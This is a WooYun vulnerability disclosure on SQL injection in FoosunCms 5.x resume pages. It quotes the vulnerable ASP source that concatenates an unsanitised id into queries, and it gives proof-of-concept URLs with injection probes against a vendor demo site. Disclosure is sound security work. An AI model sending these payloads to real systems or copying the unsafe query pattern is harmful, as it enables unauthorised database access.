当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-078961

漏洞标题:FoosunCms 5.x最新版本多处sql注入

相关厂商:FoosunCms

漏洞作者: menmen519

提交时间:2014-10-15 11:41

修复时间:2015-01-13 11:42

公开时间:2015-01-13 11:42

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2014-10-15: 积极联系厂商并且等待厂商认领中,细节不对外公开
2015-01-13: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

FoosunCms 5.x最新版本多处sql注入

详细说明:

直接看代码:
User/job/lib/AP_Resume_workcity.asp:(9-15):

<%
response.Charset="GB2312"
Dim resumeObj,id,Conn,action
MF_Default_Conn
id=trim(NoSqlHack(request.QueryString("id")))
action=trim(NoSqlHack(request.QueryString("action")))
Set resumeObj=New cls_resume
if id<>"" then call resumeObj.getResumeInfo("workcity",id)
%>


这里面有一个getResumeInfo函数 ,我们跟进去看看
cls_resume.asp:

Public function getResumeInfo(part,id)
		Dim sqlstatement,resumeRs
		Set resumeRs=Server.CreateObject(G_FS_RS)
		select case NoSqlHack(part)
			case "baseinfo"    sqlstatement="select BID,UserNumber,Uname,Sex,PictureExt,Birthday,CertificateClass,CertificateNo,CurrentWage,CurrencyType,WorkAge,Province,City,HomeTel,CompanyTel,Mobile,Email,QQ,isPublic,click,lastTime,address,ShenGao,XueLi,HowDay from FS_AP_Resume_BaseInfo where bid="&CintStr(id)
			case "intention"   sqlstatement="select BID,UserNumber,WorkType,Salary,SelfAppraise from FS_AP_Resume_Intention where bid="&id
			case "position"    sqlstatement="select BID,UserNumber,trade,job from FS_AP_Resume_Position where bid="&id
			case "workcity"    sqlstatement="select BID,UserNumber,Province,City from FS_AP_Resume_WorkCity where bid="&id
			case "workexp"     sqlstatement="select BID,UserNumber,BeginDate,EndDate,CompanyName,CompanyKind,Trade,Job,Department,Description,Certifier,CertifierTel from FS_AP_Resume_WorkExp where bid="&CintStr(id)
			case "educateexp"  sqlstatement="select BID,UserNumber,BeginDate,EndDate,SchoolName,Specialty,Diploma,Description from FS_AP_Resume_EducateExp where bid="&CintStr(id)
			case "trainexp"    sqlstatement="select BID,UserNumber,BeginDate,EndDate,TrainOrgan,TrainAdress,TrainContent,Certificate from FS_AP_Resume_TrainExp where bid="&CintStr(id)
			case "language"    sqlstatement="select BID,UserNumber,Language,Degree from FS_AP_Resume_Language where bid="&CintStr(id)
			case "certificate" sqlstatement="select BID,UserNumber,FetchDate,Certificate,Score from FS_AP_Resume_Certificate where bid="&CintStr(id)
			case "projectexp"  sqlstatement="select BID,UserNumber,BeginDate,EndDate,Project,SoftSettings,HardSettings,Tools,ProjectDescript,Duty from FS_AP_Resume_ProjectExp where bid="&CintStr(id)
			case "other"       sqlstatement="select BID,UserNumber,Title,Content from FS_AP_Resume_Other where bid="&CintStr(id)
			case "mail"        sqlstatement="select BID,UserNumber,MailName,Content from FS_AP_Resume_Mail where bid="&CintStr(id)
		End select
		resumeRs.open sqlstatement,Conn,1,3
		if resumeRs.eof then exit function
		if part="baseinfo" then
			 base_BID=resumeRs("BID")
			 base_UserNumber=resumeRs("UserNumber")
			 base_Uname=resumeRs("Uname")
			 base_Sex=resumeRs("Sex")
			 base_PictureExt=resumeRs("PictureExt")
			 base_Birthday=resumeRs("Birthday")
			 base_CertificateClass=resumeRs("CertificateClass")
			 base_CertificateNo=resumeRs("CertificateNo")
			 base_CurrentWage=resumeRs("CurrentWage")
			 base_CurrencyType=resumeRs("CurrencyType")
			 base_WorkAge=resumeRs("WorkAge")
			 base_Province=resumeRs("Province")
			 base_City=resumeRs("City")
			 base_HomeTel=resumeRs("HomeTel")
			 base_CompanyTel=resumeRs("CompanyTel")
			 base_Mobile=resumeRs("CompanyTel")
			 base_Email=resumeRs("Email")
			 base_QQ=resumeRs("QQ")
			 base_isPublic=resumeRs("isPublic")
			 base_click=resumeRs("click")
			 base_lastTime=resumeRs("lastTime")
			 
			 base_address=resumeRs("address")
			 base_ShenGao=resumeRs("ShenGao")
			 base_XueLi=resumeRs("XueLi")
			 base_HowDay=resumeRs("HowDay")
		Elseif part="intention" then
			Itn_WorkType=resumeRs("WorkType")
			Itn_Salary=resumeRs("Salary")
			Itn_SelfAppraise=resumeRs("SelfAppraise")
		Elseif part="position" then
			pos_trade=resumeRs("trade")
			pos_job=resumeRs("job")
		Elseif part="workexp" then
			wep_BeginDate=resumeRs("BeginDate")
			wep_EndDate=resumeRs("EndDate")
			wep_CompanyName=resumeRs("CompanyName")
			wep_CompanyKind=resumeRs("CompanyKind")
			wep_Trade=resumeRs("Trade")
			wep_Job=resumeRs("job")
			wep_Department=resumeRs("Department")
			wep_workDescription=resumeRs("Description")
			wep_Certifier=resumeRs("Certifier")
			wep_CertifierTel=resumeRs("CertifierTel")
		Elseif part="educateexp" then
			edu_BeginDate=resumeRs("BeginDate")
			edu_EndDate=resumeRs("EndDate")
			edu_SchoolName=resumeRs("SchoolName")
			edu_Specialty=resumeRs("Specialty")
			edu_Diploma=resumeRs("Diploma")
			edu_Description=resumeRs("Description")
		Elseif part="trainexp" then
			train_BeginDate=resumeRs("BeginDate")
			train_EndDate=resumeRs("EndDate")
			train_TrainOrgan=resumeRs("TrainOrgan")
			train_TrainAdress=resumeRs("TrainAdress")
			train_TrainContent=resumeRs("TrainContent")
			train_Certificate=resumeRs("Certificate")
		Elseif part="language" then
			lng_Language=resumeRs("Language")
			lng_Degree=resumeRs("Degree")
		Elseif part="certificate" then
			cer_FetchDate=resumeRs("FetchDate")
			cer_Certificate=resumeRs("Certificate")
			cer_Score=resumeRs("Score")
		Elseif part="projectexp" Then
			Pro_BeginDate=resumeRs("BeginDate")
			Pro_EndDate=resumeRs("EndDate")
			Pro_Project=resumeRs("Project")
			Pro_SoftSettings=resumeRs("SoftSettings")
			Pro_HardSettings=resumeRs("HardSettings")
			Pro_Tools=resumeRs("Tools")
			Pro_ProjectDescript=resumeRs("ProjectDescript")
			Pro_Duty=resumeRs("Duty")
		Elseif part="other" Then
			o_title=resumeRs("title")
			o_content=resumeRs("content")
		Elseif part="mail" Then
			mailTitle=resumeRs("MailName")
			mailContent=resumeRs("Content")
		End if
	End function


看到这里 :
case "intention" sqlstatement="select BID,UserNumber,WorkType,Salary,SelfAppraise from FS_AP_Resume_Intention where bid="&id
case "position" sqlstatement="select BID,UserNumber,trade,job from FS_AP_Resume_Position where bid="&id
case "workcity" sqlstatement="select BID,UserNumber,Province,City from FS_AP_Resume_WorkCity where bid="&id
这三个没有做任何处理
我们直接访问:
http://demo.foosun.net/foosun500/User/job/lib/AP_Resume_workcity.asp?action=workcity&id=1 and exists (select count(*) from MSysAccessObjects)
正常访问,我们可以添加一个关键字,让它sql报错
http://demo.foosun.net/foosun500/User/job/lib/AP_Resume_workcity.asp?action=workcity&id=1 and exists (select count(*) from MSysAccessObjects1)

1.png


这里我们已经证明了我们的猜想
下来看第二处
User\Job\lib\AP_Resume_Position.asp:

<%
response.Charset="GB2312"
Dim resumeObj,id,Conn,action
MF_Default_Conn
id=trim(NoSqlHack(request.QueryString("id")))
action=trim(NoSqlHack(request.QueryString("action")))
Set resumeObj=New cls_resume
if id<>"" then call resumeObj.getResumeInfo("position",id)
%>



第三处:
FoosunCMS\User\Job\lib\AP_Resume_Intention.asp:

Response.Charset="GB2312"
session("resumeStep")="baseinfo"
Dim resumeObj,id,Conn
MF_Default_Conn
id=trim(NoSqlHack(request.QueryString("id")))
Set resumeObj=New cls_resume
if id<>"" then call resumeObj.getResumeInfo("intention",id)
Conn.close
Set Conn=nothing
%>


ok.................

漏洞证明:

修复方案:

版权声明:转载请注明来源 menmen519@乌云

漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝